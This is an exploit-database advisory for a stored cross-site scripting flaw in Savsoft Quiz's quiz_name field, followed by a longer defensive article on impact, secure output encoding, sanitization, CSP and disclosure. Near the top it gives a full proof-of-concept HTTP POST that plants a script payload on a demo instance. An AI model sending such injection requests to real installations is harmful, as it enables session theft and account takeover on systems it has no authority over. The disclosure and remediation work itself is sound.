Savsoft Quiz v6.0 Enterprise - Stored XSS

Exploit Author: Eren Sen Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-04-13 
# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site
Scripting
# Date: 2024-01-03
# Exploit Author: Eren Sen
# Vendor: SAVSOFT QUIZ
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://savsoftquiz.com/web/index.php/online-demo/
# Version: < 6.0
# CVE-ID: N/A
# Tested on: Kali Linux / Windows 10
# Vulnerabilities Discovered Date : 2024/01/03

# Persistent Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: quiz_name

# Proof of Concepts:

https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13

# HTTP Request:

POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1
Host: demos1.softaculous.com
Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Length: 411
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://demos1.softaculous.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=


Savsoft Quiz v6.0 Enterprise — Stored Cross‑Site Scripting (XSS): Analysis, Risks, and Remediation

Overview

Stored Cross‑Site Scripting (stored XSS) occurs when an application accepts user input, persists it (in a database or other storage), and later renders that input in a web page without proper context‑aware encoding or sanitization. In affected versions of Savsoft Quiz prior to 6.0, a stored XSS weakness was reported in a field used for quiz metadata. This article explains the vulnerability class, likely root causes, impact, safe detection approaches, and practical remediation strategies for developers and defenders.

What is Stored XSS and why it matters

  • Stored XSS allows an attacker to inject data that is saved server‑side and served to other users later. When victim browsers render that data as active HTML/JavaScript, the injected script runs in the victim's origin.
  • Consequences include session theft, account takeover, user impersonation, unauthorized actions, and pivoting within the application context.
  • Stored XSS is particularly dangerous in multi‑user applications with administrative or instructor roles, as arbitrary script execution can impact many users and persist over time.

Root cause — typical failure modes

The common causes that lead to stored XSS are:

  • Output contexts treated as safe without encoding (for example, directly echoing database values into an HTML page).
  • Assuming input validation alone is sufficient (input validation is useful but must be paired with output encoding).
  • Allowing untrusted HTML without a robust sanitization policy or a trusted sanitizer.

Impact and threat scenarios

  • Administrative or instructor dashboards that display stored strings are high‑value targets: an attacker can craft a payload that executes whenever staff view the quiz details.
  • Stored XSS in public quiz listings may affect all students or anonymous visitors.
  • Combined with other weaknesses (weak session cookies, missing SameSite/HttpOnly flags), the practical impact increases (cookie theft, CSRF bypasses).

Safe detection and testing guidance (non‑actionable)

Testing for stored XSS should be performed only in controlled, authorized environments (test installations, staging boxes, or with explicit permission). Recommended approaches:

  • Review application flows where user data is saved and later displayed. Map input→storage→render paths.
  • Use automated scanners and interactive application security testing (IAST/DAST) to locate reflections and storage points, then prioritize manual review for the identified endpoints.
  • Manually inspect templates and server code for direct output of user data without context‑aware encoding.
  • Log and monitor application inputs and rendering contexts to help triage any suspicious content found in stored fields.

Secure coding examples and recommended fixes

Below are defensive examples showing common vulnerable patterns and corrected approaches. These examples are illustrative and use PHP as a representative server language; the principles apply to any technology stack: always perform context‑aware escaping when rendering untrusted data.

// Vulnerable pattern (do not use):
// Reading a stored value and echoing it directly into an HTML page
echo $quiz_name;

Explanation: Directly printing a value that came from user input or storage into an HTML page can result in execution of embedded markup or scripts when rendered by a browser. Always encode for the output context.

// Correct: HTML‑context encoding (PHP example)
echo htmlspecialchars($quiz_name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

Explanation: htmlspecialchars converts characters such as <, >, ", and ' into HTML entities, preventing the browser from interpreting them as markup. Use the correct flags and UTF‑8 to avoid encoding errors.

// If limited HTML is required, sanitize with a well‑maintained library (example using HTML Purifier)
// $config = HTMLPurifier_Config::createDefault();
// $purifier = new HTMLPurifier($config);
// echo $purifier->purify($user_html);

Explanation: When applications allow a subset of HTML (for rich descriptions), use a whitelist sanitizer like HTML Purifier that removes unsafe tags and attributes while preserving benign formatting. Do not implement ad‑hoc tag stripping — use well‑tested libraries.

// Content Security Policy (CSP) example to reduce impact
// Send this header from server-side for pages that render user content:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self';

Explanation: A restrictive CSP can prevent injected scripts from executing (for example by disallowing inline scripts). CSP is a defense in depth measure and should complement proper escaping/sanitization, not replace it.

Additional remediation and deployment recommendations

  • Apply context‑sensitive escaping: HTML encode when outputting into element content, attribute encode for attributes, JavaScript‑encode for inline scripts, and URL‑encode for query strings.
  • Where rich HTML is required, implement a strict whitelist policy and sanitize on input or on output consistently.
  • Implement secure defaults in templates (many template engines offer automatic escaping — enable it).
  • Harden cookies: set HttpOnly, Secure and SameSite attributes to mitigate theft via XSS and CSRF.
  • Use HTTP response headers: Content-Security-Policy, X-Content-Type-Options: nosniff, and Referrer-Policy.
  • Apply principle of least privilege to database accounts and limit who can create/edit content that is displayed to privileged users.

Detection in production and defenses

  • Deploy a Web Application Firewall (WAF) as a compensating control while permanent fixes are developed; tune rules to reduce false positives and avoid blocking legitimate traffic.
  • Monitor server logs and client‑side error reports for unusual scripts or exceptions originating from user content.
  • Use runtime application self‑protection (RASP) or XSS auditor tooling to detect and alert on exploit attempts.

Incident response and disclosure

If you discover stored XSS in a production environment:

  • Contain exposure by disabling or sanitizing the affected field where possible, then deploy a code fix and patch the application.
  • Notify the vendor or maintainers via their official security contact. Provide reproduction steps on a safe/test instance if requested by the vendor, and coordinate disclosure timelines responsibly.
  • Consider assigning a vulnerability severity (e.g., CVSS) based on exploitability, impacted user roles, and reach; prioritize remediation for high‑impact flows.

Checklist — quick remediation summary

Action Priority
Apply context‑aware output encoding for all stored user data High
Use a proven HTML sanitizer when limited HTML is allowed High
Enable template engine auto‑escape High
Deploy CSP and secure headers Medium
Harden authentication/session settings and audit logs Medium
Establish secure development and security testing processes Ongoing

Final notes

Stored XSS continues to be one of the most common and impactful web security issues. Fixing it requires a disciplined approach: identify where untrusted data flows into the UI, apply context‑aware encoding or robust sanitization, and harden the deployment environment with appropriate headers and monitoring. For specific vendor fixes, coordinate with the software vendor or maintainer and follow responsible disclosure practices to ensure users are protected while patches are developed and deployed.